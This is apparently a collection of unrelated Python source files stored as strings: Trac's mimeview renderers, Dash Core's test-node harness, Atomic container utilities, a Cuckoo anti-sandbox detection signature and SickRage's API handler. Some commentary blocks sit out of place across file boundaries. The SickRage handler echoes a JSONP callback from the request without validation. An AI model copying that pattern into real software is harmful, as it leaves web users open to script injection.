`None` if detection failed.\n """"""\n\n mimetype = get_mimetype(filename, content, self.mime_map)\n charset = None\n if mimetype:\n charset = self.get_charset(content, mimetype)\n if mimetype and charset and not \'charset\' in mimetype:\n mimetype += \'; charset=\' + charset\n return mimetype\n\n def is_binary(self, mimetype=None, filename=None, content=None):\n """"""Check if a file must be considered as binary.""""""\n if not mimetype and filename:\n mimetype = self.get_mimetype(filename, content)\n if mimetype:\n mimetype = ct_mimetype(mimetype)\n if mimetype in self.treat_as_binary:\n return True\n if content is not None and is_binary(content):\n return True\n return False\n\n def to_utf8(self, content, mimetype=None):\n """"""Convert an encoded `content` to utf-8.\n\n :deprecated: since 0.10, you should use `unicode` strings only.\n """"""\n return to_utf8(content, self.get_charset(content, mimetype))\n\n def to_unicode(self, content, mimetype=None, charset=None):\n """"""Convert `content` (an encoded `str` object) to an `unicode` object.\n\n This calls `trac.util.to_unicode` with the `charset` provided,\n or the one obtained by `Mimeview.get_charset()`.\n """"""\n if not charset:\n charset = self.get_charset(content, mimetype)\n return to_unicode(content, charset)\n\n def configured_modes_mapping(self, renderer):\n """"""Return a MIME type to `(mode,quality)` mapping for given `option`""""""\n types, option = {}, \'%s_modes\' % renderer\n for mapping in self.config[\'mimeviewer\'].getlist(option):\n if not mapping:\n continue\n try:\n mimetype, mode, quality = mapping.split(\':\')\n types[mimetype] = (mode, int(quality))\n except (TypeError, ValueError):\n self.log.warning(""Invalid mapping \'%s\' specified in \'%s\' ""\n ""option."", mapping, option)\n return types\n \n def preview_data(self, context, content, length, mimetype, filename,\n url=None, annotations=None, force_source=False):\n """"""Prepares a rendered preview of the given `content`.\n\n Note: `content` will usually be an object with a `read` method.\n """""" \n data = {\'raw_href\': url, \'size\': length,\n \'max_file_size\': self.max_preview_size,\n \'max_file_size_reached\': False,\n \'rendered\': None,\n }\n if length >= self.max_preview_size:\n data[\'max_file_size_reached\'] = True\n else:\n result = self.render(context, 
mimetype, content, filename, url,\n annotations, force_source=force_source)\n data[\'rendered\'] = result\n return data\n\n def send_converted(self, req, in_type, content, selector, filename=\'file\'):\n """"""Helper method for converting `content` and sending it directly.\n\n `selector` can be either a key or a MIME Type.""""""\n from trac.web.api import RequestDone\n content, output_type, ext = self.convert_content(req, in_type,\n content, selector)\n if isinstance(content, unicode):\n content = content.encode(\'utf-8\')\n req.send_response(200)\n req.send_header(\'Content-Type\', output_type)\n req.send_header(\'Content-Length\', len(content))\n if filename:\n req.send_header(\'Content-Disposition\',\n content_disposition(filename=\'%s.%s\' % \n (filename, ext)))\n req.end_headers()\n req.write(content)\n raise RequestDone\n\n\ndef _group_lines(stream):\n space_re = re.compile(\'(?P (?: +))|^(?P<\\w+.*?>)?( )\')\n def pad_spaces(match):\n m = match.group(\'spaces\')\n if m:\n div, mod = divmod(len(m), 2)\n return div * u\'\\xa0 \' + mod * u\'\\xa0\'\n return (match.group(\'tag\') or \'\') + u\'\\xa0\'\n\n def _generate():\n stack = []\n def _reverse():\n for event in reversed(stack):\n if event[0] is START:\n yield END, event[1][0], event[2]\n else:\n yield END_NS, event[1][0], event[2]\n\n for kind, data, pos in stream:\n if kind is TEXT:\n lines = data.split(\'\\n\')\n if lines:\n # First element\n for e in stack:\n yield e\n yield kind, lines.pop(0), pos\n for e in _reverse():\n yield e\n # Subsequent ones, prefix with \\n\n for line in lines:\n yield TEXT, \'\\n\', pos\n for e in stack:\n yield e\n yield kind, line, pos\n for e in _reverse():\n yield e\n else:\n if kind is START or kind is START_NS:\n stack.append((kind, data, pos))\n elif kind is END or kind is END_NS:\n stack.pop()\n else:\n yield kind, data, pos\n\n buf = []\n \n # Fix the \\n at EOF.\n if not isinstance(stream, list):\n stream = list(stream)\n found_text = False\n \n for i in range(len(stream)-1, -1, -1):\n if stream[i][0] is TEXT:\n e = stream[i]\n # One chance to strip a \\n\n if not found_text and e[1].endswith(\'\\n\'):\n stream[i] = (e[0], e[1][:-1], e[2])\n if len(e[1]):\n found_text = True\n break\n if not found_text:\n raise StopIteration\n\n for kind, data, pos in _generate():\n if kind is TEXT and data == \'\\n\':\n yield Stream(buf[:])\n del buf[:]\n else:\n if kind is TEXT:\n data = space_re.sub(pad_spaces, data)\n buf.append((kind, data, pos))\n if buf:\n yield Stream(buf[:])\n\n\n# -- Default annotators\n\nclass LineNumberAnnotator(Component):\n """"""Text annotator that adds a column with line numbers.""""""\n implements(IHTMLPreviewAnnotator)\n\n # ITextAnnotator methods\n\n def get_annotation_type(self):\n return \'lineno\', _(\'Line\'), _(\'Line numbers\')\n\n def get_annotation_data(self, context):\n return None\n\n def annotate_row(self, context, row, lineno, line, data):\n row.append(tag.th(id=\'L%s\' % lineno)(\n tag.a(lineno, href=\'#L%s\' % lineno)\n ))\n\n\n# -- Default renderers\n\nclass PlainTextRenderer(Component):\n """"""HTML preview renderer for plain text, and fallback for any kind of text\n for which no more specific renderer is available.\n """"""\n implements(IHTMLPreviewRenderer)\n\n expand_tabs = True\n returns_source = True\n\n def get_quality_ratio(self, mimetype):\n if mimetype in Mimeview(self.env).treat_as_binary:\n return 0\n return 1\n\n def render(self, context, mimetype, content, filename=None, url=None):\n if is_binary(content):\n self.log.debug(""Binary data; no 
preview available"")\n return\n\n self.log.debug(""Using default plain text mimeviewer"")\n return content_to_unicode(self.env, content, mimetype)\n\n\nclass ImageRenderer(Component):\n """"""Inline image display.\n \n This component doesn\'t need the `content` at all.\n """"""\n implements(IHTMLPreviewRenderer)\n\n def get_quality_ratio(self, mimetype):\n if mimetype.startswith(\'image/\'):\n return 8\n return 0\n\n def render(self, context, mimetype, content, filename=None, url=None):\n if url:\n return tag.div(tag.img(src=url, alt=filename),\n class_=\'image-file\')\n\n\nclass WikiTextRenderer(Component):\n """"""HTML renderer for files containing Trac\'s own Wiki formatting markup.""""""\n implements(IHTMLPreviewRenderer)\n\n def get_quality_ratio(self, mimetype):\n if mimetype in (\'text/x-trac-wiki\', \'application/x-trac-wiki\'):\n return 8\n return 0\n\n def render(self, context, mimetype, content, filename=None, url=None):\n from trac.wiki.formatter import format_to_html\n return format_to_html(self.env, context,\n content_to_unicode(self.env, content, mimetype))\n', '#!/usr/bin/env python3\n# Copyright (c) 2017 The Bitcoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n""""""Class for dashd node under test""""""\n\nimport decimal\nimport errno\nimport http.client\nimport json\nimport logging\nimport os\nimport subprocess\nimport time\n\nfrom .authproxy import JSONRPCException\nfrom .mininode import NodeConn\nfrom .util import (\n assert_equal,\n get_rpc_proxy,\n rpc_url,\n wait_until,\n p2p_port,\n)\n\nBITCOIND_PROC_WAIT_TIMEOUT = 60\n\nclass TestNode():\n """"""A class for representing a dashd node under test.\n\n This class contains:\n\n - state about the node (whether it\'s running, etc)\n - a Python subprocess.Popen object representing the running process\n - an RPC connection to the node\n - one or more P2P connections to the node\n\n\n To make things easier for the test writer, any unrecognised messages will\n be dispatched to the RPC connection.""""""\n\n def __init__(self, i, dirname, extra_args, rpchost, timewait, binary, stderr, mocktime, coverage_dir):\n self.index = i\n self.datadir = os.path.join(dirname, ""node"" + str(i))\n self.rpchost = rpchost\n if timewait:\n self.rpc_timeout = timewait\n else:\n # Wait for up to 60 seconds for the RPC server to respond\n self.rpc_timeout = 60\n if binary is None:\n self.binary = os.getenv(""BITCOIND"", ""dashd"")\n else:\n self.binary = binary\n self.stderr = stderr\n self.coverage_dir = coverage_dir\n # Most callers will just need to add extra args to the standard list below. 
For those callers that need more flexibility, they can just set the args property directly.\n self.extra_args = extra_args\n self.args = [self.binary, ""-datadir="" + self.datadir, ""-server"", ""-keypool=1"", ""-discover=0"", ""-rest"", ""-logtimemicros"", ""-debug"", ""-debugexclude=libevent"", ""-debugexclude=leveldb"", ""-mocktime="" + str(mocktime), ""-uacomment=testnode%d"" % i]\n\n self.cli = TestNodeCLI(os.getenv(""BITCOINCLI"", ""dash-cli""), self.datadir)\n\n # Don\'t try auto backups (they fail a lot when running tests)\n self.args.append(""-createwalletbackups=0"")\n\n self.running = False\n self.process = None\n self.rpc_connected = False\n self.rpc = None\n self.url = None\n self.log = logging.getLogger(\'TestFramework.node%d\' % i)\n\n self.p2ps = []\n\n def __getattr__(self, name):\n """"""Dispatches any unrecognised messages to the RPC connection.""""""\n assert self.rpc_connected and self.rpc is not None, ""Error: no RPC connection""\n return getattr(self.rpc, name)\n\n def start(self, extra_args=None, stderr=None):\n """"""Start the node.""""""\n if extra_args is None:\n extra_args = self.extra_args\n if stderr is None:\n stderr = self.stderr\n self.process = subprocess.Popen(self.args + extra_args, stderr=stderr)\n self.running = True\n self.log.debug(""dashd started, waiting for RPC to come up"")\n\n def wait_for_rpc_connection(self):\n """"""Sets up an RPC connection to the dashd process. Raises an AssertionError if unable to connect.""""""\n # Poll at a rate of four times per second\n poll_per_s = 4\n for _ in range(poll_per_s * self.rpc_timeout):\n assert self.process.poll() is None, ""dashd exited with status %i during initialization"" % self.process.returncode\n try:\n self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)\n self.rpc.getblockcount()\n # If the call to getblockcount() succeeds then the RPC connection is up\n self.rpc_connected = True\n self.url = self.rpc.url\n self.log.debug(""RPC successfully started"")\n return\n except IOError as e:\n if e.errno != errno.ECONNREFUSED: # Port not yet open?\n raise # unknown IO error\n except JSONRPCException as e: # Initialization phase\n # -28 RPC in warmup\n # -342 Service unavailable, RPC server started but is shutting down due to error\n if e.error[\'code\'] != -28 and e.error[\'code\'] != -342:\n raise # unknown JSON RPC exception\n except ValueError as e: # cookie file not found and no rpcuser or rpcpassword. dashd still starting\n if ""No RPC credentials"" not in str(e):\n raise\n time.sleep(1.0 / poll_per_s)\n raise AssertionError(""Unable to connect to dashd"")\n\n def get_wallet_rpc(self, wallet_name):\n assert self.rpc_connected\n assert self.rpc\n wallet_path = ""wallet/%s"" % wallet_name\n return self.rpc / wallet_path\n\n def stop_node(self, wait=0):\n """"""Stop the node.""""""\n if not self.running:\n return\n self.log.debug(""Stopping node"")\n try:\n self.stop(wait=wait)\n except http.client.CannotSendRequest:\n self.log.exception(""Unable to stop node."")\n del self.p2ps[:]\n\n def is_node_stopped(self):\n """"""Checks whether the node has stopped.\n\n Returns True if the node has stopped. False otherwise.\n This method is responsible for freeing resources (self.process).""""""\n if not self.running:\n return True\n return_code = self.process.poll()\n if return_code is None:\n return False\n\n # process has stopped. 
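Since poll() returned a value, the child\n # process has exited and its exit status is available. 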
Assert that it didn\'t return an error code.\n assert_equal(return_code, 0)\n self.running = False\n self.process = None\n self.rpc_connected = False\n self.rpc = None\n self.log.debug(""Node stopped"")\n return True\n\n def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):\n wait_until(self.is_node_stopped, timeout=timeout)\n\n def node_encrypt_wallet(self, passphrase):\n """"""""Encrypts the wallet.\n\n This causes dashd to shutdown, so this method takes\n care of cleaning up resources.""""""\n self.encryptwallet(passphrase)\n self.wait_until_stopped()\n\n def add_p2p_connection(self, p2p_conn, **kwargs):\n """"""Add a p2p connection to the node.\n\n This method adds the p2p connection to the self.p2ps list and also\n returns the connection to the caller.""""""\n if \'dstport\' not in kwargs:\n kwargs[\'dstport\'] = p2p_port(self.index)\n if \'dstaddr\' not in kwargs:\n kwargs[\'dstaddr\'] = \'127.0.0.1\'\n self.p2ps.append(p2p_conn)\n kwargs.update({\'rpc\': self.rpc, \'callback\': p2p_conn})\n p2p_conn.add_connection(NodeConn(**kwargs))\n\n return p2p_conn\n\n @property\n def p2p(self):\n """"""Return the first p2p connection\n\n Convenience property - most tests only use a single p2p connection to each\n node, so this saves having to write node.p2ps[0] many times.""""""\n assert self.p2ps, ""No p2p connection""\n return self.p2ps[0]\n\n def disconnect_p2ps(self):\n """"""Close all p2p connections to the node.""""""\n for p in self.p2ps:\n # Connection could have already been closed by other end.\n if p.connection is not None:\n p.connection.disconnect_node()\n self.p2ps = []\n\n\nclass TestNodeCLI():\n """"""Interface to bitcoin-cli for an individual node""""""\n\n def __init__(self, binary, datadir):\n self.args = []\n self.binary = binary\n self.datadir = datadir\n self.input = None\n\n def __call__(self, *args, input=None):\n # TestNodeCLI is callable with bitcoin-cli command-line args\n self.args = [str(arg) for arg in args]\n self.input = input\n return self\n\n def __getattr__(self, command):\n def dispatcher(*args, **kwargs):\n return self.send_cli(command, *args, **kwargs)\n return dispatcher\n\n def send_cli(self, command, *args, **kwargs):\n """"""Run bitcoin-cli command. 
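For example, for a TestNodeCLI\n instance cli built with the default ""dash-cli"" binary, cli.getblockcount()\n (dispatched through __getattr__ above) runs\n ""dash-cli -datadir=<datadir> getblockcount"". 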
Deserializes returned string as python object.""""""\n\n pos_args = [str(arg) for arg in args]\n named_args = [str(key) + ""="" + str(value) for (key, value) in kwargs.items()]\n assert not (pos_args and named_args), ""Cannot use positional arguments and named arguments in the same bitcoin-cli call""\n p_args = [self.binary, ""-datadir="" + self.datadir] + self.args\n if named_args:\n p_args += [""-named""]\n p_args += [command] + pos_args + named_args\n process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n cli_stdout, cli_stderr = process.communicate(input=self.input)\n returncode = process.poll()\n if returncode:\n # Ignore cli_stdout, raise with cli_stderr\n raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)\n return json.loads(cli_stdout, parse_float=decimal.Decimal)\n', '# !/usr/bin/python\n# Copyright (C) 2015 Red Hat, All rights reserved.\n# AUTHORS: Alex Collins dummy@email.com\n\nimport sys\nimport json\nimport subprocess\nimport collections\nfrom fnmatch import fnmatch as matches\nfrom docker.utils import kwargs_from_env\n\nimport docker\nimport selinux\n\n""""""Atomic Utility Module""""""\n\nReturnTuple = collections.namedtuple(\'ReturnTuple\',\n [\'return_code\', \'stdout\', \'stderr\'])\n\nif sys.version_info[0] < 3:\n input = raw_input\nelse:\n input = input\n\n\ndef _decompose(compound_name):\n """""" \'[reg/]repo[:tag]\' -> (reg, repo, tag) """"""\n reg, repo, tag = \'\', compound_name, \'\'\n if \'/\' in repo:\n reg, repo = repo.split(\'/\', 1)\n if \':\' in repo:\n repo, tag = repo.rsplit(\':\', 1)\n return reg, repo, tag\n\n\ndef image_by_name(img_name, images=None):\n """"""\n Returns a list of image data for images which match img_name. Will\n optionally take a list of images from a docker.Client.images\n query to avoid multiple docker queries.\n """"""\n i_reg, i_rep, i_tag = _decompose(img_name)\n\n # Correct for bash-style matching expressions.\n if not i_reg:\n i_reg = \'*\'\n if not i_tag:\n i_tag = \'*\'\n\n # If the images were not passed in, go get them.\n if images is None:\n c = docker.Client(**kwargs_from_env())\n images = c.images(all=False)\n\n valid_images = []\n for i in images:\n for t in i[\'RepoTags\']:\n reg, rep, tag = _decompose(t)\n if matches(reg, i_reg) \\\n and matches(rep, i_rep) \\\n and matches(tag, i_tag):\n valid_images.append(i)\n break\n # Some repo after decompose end up with the img_name\n # at the end. i.e. 
rhel7/rsyslog\n if rep.endswith(img_name):\n valid_images.append(i)\n break\n return valid_images\n\n\ndef subp(cmd):\n """"""\n Run a command as a subprocess.\n Return a triple of return code, standard out, standard err.\n """"""\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = proc.communicate()\n return ReturnTuple(proc.returncode, stdout=out, stderr=err)\n\n\ndef default_container_context():\n if selinux.is_selinux_enabled() != 0:\n fd = open(selinux.selinux_lxc_contexts_path())\n for i in fd.readlines():\n name, context = i.split(""="")\n if name.strip() == ""file"":\n return context.strip(""\\n\\"" "")\n return """"\n\n\ndef writeOut(output, lf=""\\n""):\n sys.stdout.flush()\n sys.stdout.write(str(output) + lf)\n\n\ndef output_json(json_data):\n \'\'\' Pretty print json data \'\'\'\n writeOut(json.dumps(json_data, indent=4, separators=(\',\', \': \')))\n\n\ndef print_scan_summary(json_data, names=None):\n \'\'\'\n Print a summary of the data returned from a\n CVE scan.\n \'\'\'\n max_col_width = 50\n min_width = 15\n\n def _max_width(data):\n max_name = 0\n for name in data:\n max_name = len(data[name]) if len(data[name]) > max_name \\\n else max_name\n # If the max name length is less that max_width\n if max_name < min_width:\n max_name = min_width\n\n # If the man name is greater than the max col leng\n # we wish to use\n if max_name > max_col_width:\n max_name = max_col_width\n\n return max_name\n\n clean = True\n\n if len(names) > 0:\n max_width = _max_width(names)\n else:\n max_width = min_width\n template = ""{0:"" + str(max_width) + ""} {1:5} {2:5} {3:5} {4:5}""\n sevs = [\'critical\', \'important\', \'moderate\', \'low\']\n writeOut(template.format(""Container/Image"", ""Cri"", ""Imp"", ""Med"", ""Low""))\n writeOut(template.format(""-"" * max_width, ""---"", ""---"", ""---"", ""---""))\n res_summary = json_data[\'results_summary\']\n for image in res_summary.keys():\n image_res = res_summary[image]\n if \'msg\' in image_res.keys():\n tmp_tuple = (image_res[\'msg\'], """", """", """", """")\n else:\n if len(names) < 1:\n image_name = image[:max_width]\n else:\n image_name = names[image][-max_width:]\n if len(image_name) == max_col_width:\n image_name = \'...\' + image_name[-(len(image_name) - 3):]\n\n tmp_tuple = tuple([image_name] +\n [str(image_res[sev]) for sev in sevs])\n sev_results = [image_res[sev] for sev in\n sevs if image_res[sev] > 0]\n if len(sev_results) > 0:\n clean = False\n writeOut(template.format(*tmp_tuple))\n writeOut("""")\n return clean\n\n\ndef print_detail_scan_summary(json_data, names=None):\n \'\'\'\n Print a detailed summary of the data returned from\n a CVE scan.\n \'\'\'\n clean = True\n sevs = [\'Critical\', \'Important\', \'Moderate\', \'Low\']\n cve_summary = json_data[\'host_results\']\n image_template = "" {0:10}: {1}""\n cve_template = "" {0:10}: {1}""\n for image in cve_summary.keys():\n image_res = cve_summary[image]\n writeOut("""")\n writeOut(image[:12])\n if not image_res[\'isRHEL\']:\n writeOut(image_template.format(""Result"",\n ""Not based on Red Hat""\n ""Enterprise Linux""))\n continue\n else:\n writeOut(image_template.format(""OS"", image_res[\'os\'].rstrip()))\n scan_results = image_res[\'cve_summary\'][\'scan_results\']\n\n for sev in sevs:\n if sev in scan_results:\n clean = False\n writeOut(image_template.format(sev,\n str(scan_results[sev][\'num\'])))\n for cve in scan_results[sev][\'cves\']:\n writeOut(cve_template.format(""CVE"", cve[\'cve_title\']))\n 
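# each CVE is reported with its reference URL plus the matching\n # RHSA advisory id and URL:\n 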
writeOut(cve_template.format(""CVE URL"",\n cve[\'cve_ref_url\']))\n writeOut(cve_template.format(""RHSA ID"",\n cve[\'rhsa_ref_id\']))\n writeOut(cve_template.format(""RHSA URL"",\n cve[\'rhsa_ref_url\']))\n writeOut("""")\n return clean\n\n\ndef get_mounts_by_path():\n \'\'\'\n Gets all mounted devices and paths\n :return: dict of mounted devices and related information by path\n \'\'\'\n mount_info = []\n f = open(\'/proc/mounts\', \'r\')\n for line in f:\n _tmp = line.split("" "")\n mount_info.append({\'path\': _tmp[1],\n \'device\': _tmp[0],\n \'type\': _tmp[2],\n \'options\': _tmp[3]\n }\n )\n return mount_info\n\n\ndef is_dock_obj_mounted(docker_obj):\n \'\'\'\n Check if the provided docker object, which needs to be an ID,\n is currently mounted and should be considered ""busy""\n :param docker_obj: str, must be in ID format\n :return: bool True or False\n \'\'\'\n mount_info = get_mounts_by_path()\n devices = [x[\'device\'] for x in mount_info]\n # If we can find the ID of the object in the list\n # of devices which comes from mount, safe to assume\n # it is busy.\n return any(docker_obj in x for x in devices)\n\n\ndef urllib3_disable_warnings():\n if \'requests\' not in sys.modules:\n import requests\n else:\n requests = sys.modules[\'requests\']\n\n # On latest Fedora, this is a symlink\n if hasattr(requests, \'packages\'):\n requests.packages.urllib3.disable_warnings() # pylint: disable=maybe-no-member\n else:\n # But with python-requests-2.4.3-1.el7.noarch, we need\n # to talk to urllib3 directly\n have_urllib3 = False\n try:\n if \'urllib3\' not in sys.modules:\n import urllib3\n have_urllib3 = True\n except ImportError:\n pass\n if have_urllib3:\n # Except only call disable-warnings if it exists\n if hasattr(urllib3, \'disable_warnings\'):\n urllib3.disable_warnings()\n', '# Copyright (C) 2014 Claudio ""nex"" Guarnieri (@botherder), Accuvant, Inc. (dummy@email.com)\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n\nfrom lib.cuckoo.common.abstracts import Signature\n\nclass Unhook(Signature):\n name = ""antisandbox_unhook""\n description = ""Tries to unhook or modify Windows functions monitored by Cuckoo""\n severity = 3\n confidence = 60\n categories = [""anti-sandbox""]\n authors = [""nex"",""Accuvant""]\n minimum = ""1.2""\n evented = True\n\n filter_categories = set([""__notification__""])\n\n def __init__(self, *args, **kwargs):\n Signature.__init__(self, *args, **kwargs)\n self.saw_unhook = False\n self.unhook_info = set()\n\n def on_call(self, call, process):\n subcategory = self.check_argument_call(call,\n api=""__anomaly__"",\n name=""Subcategory"",\n pattern=""unhook"")\n if subcategory:\n self.saw_unhook = True\n funcname = self.get_argument(call, ""FunctionName"")\n if funcname != """":\n if (funcname != ""SetUnhandledExceptionFilter"" and funcname != ""SetWindowsHookExW"" and funcname != ""UnhookWindowsHookEx"" and\n funcname != ""CoCreateInstance"") or self.get_argument(call, ""UnhookType"") != ""modification"":\n self.unhook_info.add(""function_name: "" + funcname + "", type: "" + self.get_argument(call, ""UnhookType""))\n \n def on_complete(self):\n if len(self.unhook_info) > 5:\n weight = len(self.unhook_info)\n confidence = 100\n\n if not self.unhook_info:\n self.saw_unhook = False\n\n for info in self.unhook_info:\n self.data.append({""unhook"" : info })\n return self.saw_unhook\n', '# coding=utf-8\n# Author: Dennis Lutter dummy@email.com\n# Author: Jonathon Saine dummy@email.com\n# URL: http://code.google.com/p/sickbeard/\n#\n# This file is part of SickRage.\n#\n# SickRage is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# SickRage is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with SickRage. 
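\n#\n# The module above illustrates the evented-signature pattern; a minimal\n# variant (names here are illustrative, the hooks follow the Signature\n# API shown there):\n#\n# class CountsCalls(Signature):\n# name = ""counts_calls""\n# evented = True\n# def on_call(self, call, process):\n# self.matched = True\n# def on_complete(self):\n# return getattr(self, \'matched\', False)\n#\n# 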
If not, see .\n\n# TODO: break this up into separate files\n# pylint: disable=C0301,C0302\n# pylint: disable=E1101,E0202,C0111,C0103\n\nimport io\nimport os\nimport re\nimport time\nimport urllib\nimport datetime\nimport traceback\n\nimport sickbeard\nfrom sickrage.helper.common import dateFormat, dateTimeFormat, pretty_file_size, sanitize_filename, timeFormat\nfrom sickrage.helper.encoding import ek\nfrom sickrage.helper.exceptions import CantUpdateShowException, ex, ShowDirectoryNotFoundException\nfrom sickrage.helper.quality import get_quality_string\nfrom sickrage.media.ShowFanArt import ShowFanArt\nfrom sickrage.media.ShowNetworkLogo import ShowNetworkLogo\nfrom sickrage.media.ShowPoster import ShowPoster\nfrom sickrage.media.ShowBanner import ShowBanner\nfrom sickrage.show.ComingEpisodes import ComingEpisodes\nfrom sickrage.show.History import History\nfrom sickrage.show.Show import Show\nfrom sickrage.system.Restart import Restart\nfrom sickrage.system.Shutdown import Shutdown\nfrom sickbeard.versionChecker import CheckVersion\nfrom sickbeard import db, logger, ui, helpers\nfrom sickbeard import search_queue\nfrom sickbeard import image_cache\nfrom sickbeard import classes\nfrom sickbeard import processTV\nfrom sickbeard import network_timezones, sbdatetime\nfrom sickbeard.common import DOWNLOADED\nfrom sickbeard.common import FAILED\nfrom sickbeard.common import IGNORED\nfrom sickbeard.common import Overview\nfrom sickbeard.common import Quality\nfrom sickbeard.common import SKIPPED\nfrom sickbeard.common import SNATCHED\nfrom sickbeard.common import SNATCHED_PROPER\nfrom sickbeard.common import UNAIRED\nfrom sickbeard.common import UNKNOWN\nfrom sickbeard.common import WANTED\nfrom sickbeard.common import ARCHIVED\nfrom sickbeard.common import statusStrings\n\ntry:\n import json\nexcept ImportError:\n # pylint: disable=F0401\n import simplejson as json\n\n# pylint: disable=F0401\nfrom tornado.web import RequestHandler\n\nindexer_ids = [""indexerid"", ""tvdbid""]\n\nRESULT_SUCCESS = 10 # only use inside the run methods\nRESULT_FAILURE = 20 # only use inside the run methods\nRESULT_TIMEOUT = 30 # not used yet :(\nRESULT_ERROR = 40 # only use outside of the run methods !\nRESULT_FATAL = 50 # only use in Api.default() ! this is the ""we encountered an internal error"" error\nRESULT_DENIED = 60 # only use in Api.default() ! this is the access denied error\nresult_type_map = {\n RESULT_SUCCESS: ""success"",\n RESULT_FAILURE: ""failure"",\n RESULT_TIMEOUT: ""timeout"",\n RESULT_ERROR: ""error"",\n RESULT_FATAL: ""fatal"",\n RESULT_DENIED: ""denied"",\n}\n\n\n# basically everything except RESULT_SUCCESS / success is bad\n\n\nclass ApiHandler(RequestHandler):\n """""" api class that returns json results """"""\n version = 5 # use an int since float-point is unpredictable\n\n def __init__(self, *args, **kwargs):\n super(ApiHandler, self).__init__(*args, **kwargs)\n\n # def set_default_headers(self):\n # self.set_header(\'Cache-Control\', \'no-store, no-cache, must-revalidate, max-age=0\')\n\n def get(self, *args, **kwargs):\n kwargs = self.request.arguments\n for arg, value in kwargs.iteritems():\n if len(value) == 1:\n kwargs[arg] = value[0]\n\n args = args[1:]\n\n # set the output callback\n # default json\n output_callback_dict = {\n \'default\': self._out_as_json,\n \'image\': self._out_as_image,\n }\n\n access_msg = u""API :: "" + self.request.remote_ip + "" - gave correct API KEY. 
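# --- Editor's sketch: Tornado hands every query parameter to the handler
# as a LIST of values; the get() method above flattens one-element lists
# so the rest of the API can treat parameters as scalars. Standalone:
def flatten_arguments(arguments):
    flat = dict(arguments)
    for key, values in flat.items():
        if isinstance(values, list) and len(values) == 1:
            flat[key] = values[0]
    return flat

if __name__ == '__main__':
    raw = {'cmd': ['shows'], 'type': ['downloaded', 'snatched']}
    assert flatten_arguments(raw) == {'cmd': 'shows',
                                      'type': ['downloaded', 'snatched']}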
ACCESS GRANTED""\n logger.log(access_msg, logger.DEBUG)\n\n # set the original call_dispatcher as the local _call_dispatcher\n _call_dispatcher = self.call_dispatcher\n # if profile was set wrap ""_call_dispatcher"" in the profile function\n if \'profile\' in kwargs:\n from profilehooks import profile\n\n _call_dispatcher = profile(_call_dispatcher, immediate=True)\n del kwargs[""profile""]\n\n try:\n out_dict = _call_dispatcher(args, kwargs)\n except Exception, e: # real internal error oohhh nooo :(\n logger.log(u""API :: "" + ex(e), logger.ERROR)\n error_data = {\n ""error_msg"": ex(e),\n ""args"": args,\n ""kwargs"": kwargs\n }\n out_dict = _responds(RESULT_FATAL, error_data,\n ""SickRage encountered an internal error! Please report to the Devs"")\n\n if \'outputType\' in out_dict:\n output_callback = output_callback_dict[out_dict[\'outputType\']]\n else:\n output_callback = output_callback_dict[\'default\']\n\n try:\n self.finish(output_callback(out_dict))\n except Exception:\n pass\n\n def _out_as_image(self, _dict):\n self.set_header(\'Content-Type\', _dict[\'image\'].get_media_type())\n return _dict[\'image\'].get_media()\n\n def _out_as_json(self, _dict):\n self.set_header(""Content-Type"", ""application/json;charset=UTF-8"")\n try:\n out = json.dumps(_dict, ensure_ascii=False, sort_keys=True)\n callback = self.get_query_argument(\'callback\', None) or self.get_query_argument(\'jsonp\', None)\n if callback:\n out = callback + \'(\' + out + \');\' # wrap with JSONP call if requested\n except Exception, e: # if we fail to generate the output fake an error\n logger.log(u""API :: "" + traceback.format_exc(), logger.DEBUG)\n out = \'{""result"": ""%s"", ""message"": ""error while composing output: %s""}\' % \\\n (result_type_map[RESULT_ERROR], ex(e))\n return out\n\n def call_dispatcher(self, args, kwargs):\n """""" calls the appropriate CMD class\n looks for a cmd in args and kwargs\n or calls the TVDBShorthandWrapper when the first args element is a number\n or returns an error that there is no such cmd\n """"""\n logger.log(u""API :: all args: \'"" + str(args) + ""\'"", logger.DEBUG)\n logger.log(u""API :: all kwargs: \'"" + str(kwargs) + ""\'"", logger.DEBUG)\n\n commands = None\n if args:\n commands, args = args[0], args[1:]\n commands = kwargs.pop(""cmd"", commands)\n\n out_dict = {}\n if commands:\n commands = commands.split(""|"")\n multi_commands = len(commands) > 1\n for cmd in commands:\n cur_args, cur_kwargs = self.filter_params(cmd, args, kwargs)\n\n if len(cmd.split(""_"")) > 1:\n cmd, cmd_index = cmd.split(""_"")\n\n logger.log(u""API :: "" + cmd + "": cur_kwargs "" + str(cur_kwargs), logger.DEBUG)\n if not (cmd in (\'show.getbanner\', \'show.getfanart\', \'show.getnetworklogo\', \'show.getposter\') and\n multi_commands): # skip these cmd while chaining\n try:\n if cmd in function_mapper:\n func = function_mapper.get(cmd) # map function\n func.rh = self # add request handler to function\n cur_out_dict = func(cur_args, cur_kwargs).run() # call function and get response\n elif _is_int(cmd):\n cur_out_dict = TVDBShorthandWrapper(cur_args, cur_kwargs, cmd).run()\n else:\n cur_out_dict = _responds(RESULT_ERROR, ""No such cmd: \'"" + cmd + ""\'"")\n except ApiError as error: # Api errors that we raised, they are harmless\n cur_out_dict = _responds(RESULT_ERROR, msg=ex(error))\n else: # if someone chained one of the forbidden commands they will get an error for this one cmd\n cur_out_dict = 